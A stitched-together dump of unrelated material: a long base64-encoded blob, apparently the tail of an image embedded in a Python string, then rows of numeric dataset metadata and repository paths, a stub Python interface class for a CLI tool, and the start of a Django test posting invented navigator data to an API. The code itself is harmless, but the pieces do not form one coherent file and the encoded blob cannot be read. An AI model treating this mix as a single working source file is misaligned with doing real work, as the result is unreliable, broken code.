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""" | 24,847 | 24,847 | 0.956132 | 1,059 | 24,847 | 22.432483 | 0.970727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178587 | 0.00008 | 24,847 | 1 | 24,847 | 24,847 | 0.777581 | 0 | 0 | 0 | 0 | 1 | 0.999195 | 0.999195 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ecba6c7b5e6388c107587b5e238eb5dca70956b9 | 229 | py | Python | controllers/__init__.py | jadson179/hacs-cli | 52a06b970f24ccdb64e2459acf4f53402d5d3bf2 | [
"Unlicense"
] | null | null | null | controllers/__init__.py | jadson179/hacs-cli | 52a06b970f24ccdb64e2459acf4f53402d5d3bf2 | [
"Unlicense"
] | null | null | null | controllers/__init__.py | jadson179/hacs-cli | 52a06b970f24ccdb64e2459acf4f53402d5d3bf2 | [
"Unlicense"
] | 1 | 2021-11-30T18:41:36.000Z | 2021-11-30T18:41:36.000Z | import argparse
class IBasic:
def add (self,args:argparse.Namespace) -> None:
pass
def remove (self,args:argparse.Namespace) -> None:
pass
def list (self,args:argparse.Namespace) -> None:
pass | 25.444444 | 54 | 0.637555 | 28 | 229 | 5.214286 | 0.464286 | 0.164384 | 0.328767 | 0.513699 | 0.719178 | 0.719178 | 0.493151 | 0 | 0 | 0 | 0 | 0 | 0.253275 | 229 | 9 | 55 | 25.444444 | 0.853801 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0.375 | 0.125 | 0 | 0.625 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
ecc658c75de9a8c421dffcd38aaff6d170871884 | 15,432 | py | Python | picbackend/tests/views/v2/navigators_views_tests.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
] | null | null | null | picbackend/tests/views/v2/navigators_views_tests.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
] | null | null | null | picbackend/tests/views/v2/navigators_views_tests.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
] | null | null | null | from django.test import TestCase
from .base_v2_api_tests import BaseConsumerNavigatorsMetricsTests
from .base_v2_api_tests import BaseV2RqstTests
import json
class NavigatorAPITests(TestCase, BaseConsumerNavigatorsMetricsTests):
def setUp(self):
self.base_url += "navigators/"
def test_add_navigator_view(self):
post_data = {
"first_name": "sdfdsfafassadr",
"last_name": "Marlsasdfsdfdsfdsfdda",
"email": "donadsfdsfa@patfdsfdie.org",
"type": "Navigator",
"county": "Montgomery",
"mpn": "Cook",
"add_base_locations": ['Lincoln Belmont Library', 'Thorek Memorial Hospital'],
'add_healthcare_locations_worked': [
{
'name': 'Edward Hospital & Immediate Careasdss',
'state_province': 'not available'
}
],
'add_healthcare_service_expertises': [
'bariatrics',
],
'add_insurance_carrier_specialties': [
{
'name': 'Health Alliance Medical Plans, Inc.',
'state_province': 'il'
},
],
'add_approved_clients_for_case_management': [
1
],
"create_resume_row": {
"profile_description": "apple",
"create_education_rows": [
{
"school": "easy",
"major": "peasy",
"degree_type": "masters"
},
{
"school": "lemon",
"major": "squeezy",
"degree_type": "masters"
},
],
"create_job_rows": [
{
"title": "easy",
"company": "peasy",
"description": "masters"
},
{
"title": "lemon",
"company": "squeezy",
"description": "masters"
},
],
},
"address_line_1": "",
"address_line_2": "",
"city": "",
"state_province": "",
"zipcode": "",
"phone": "2813307004",
"reported_region": "cook",
"video_link": "https://www.twitch.tv/videos/239858398",
"navigator_organization": "sljidsjflksa",
"db_action": "create",
}
post_json = json.dumps(post_data)
response = self.client_object.put(self.base_url, post_json, content_type="application/json")
# Test for a valid reponse code (200)
self.assertEqual(response.status_code, 200)
response_json = response.content.decode('utf-8')
response_data = json.loads(response_json)
# Test for valid decoded json data from response body
self.assertIsNotNone(response_data)
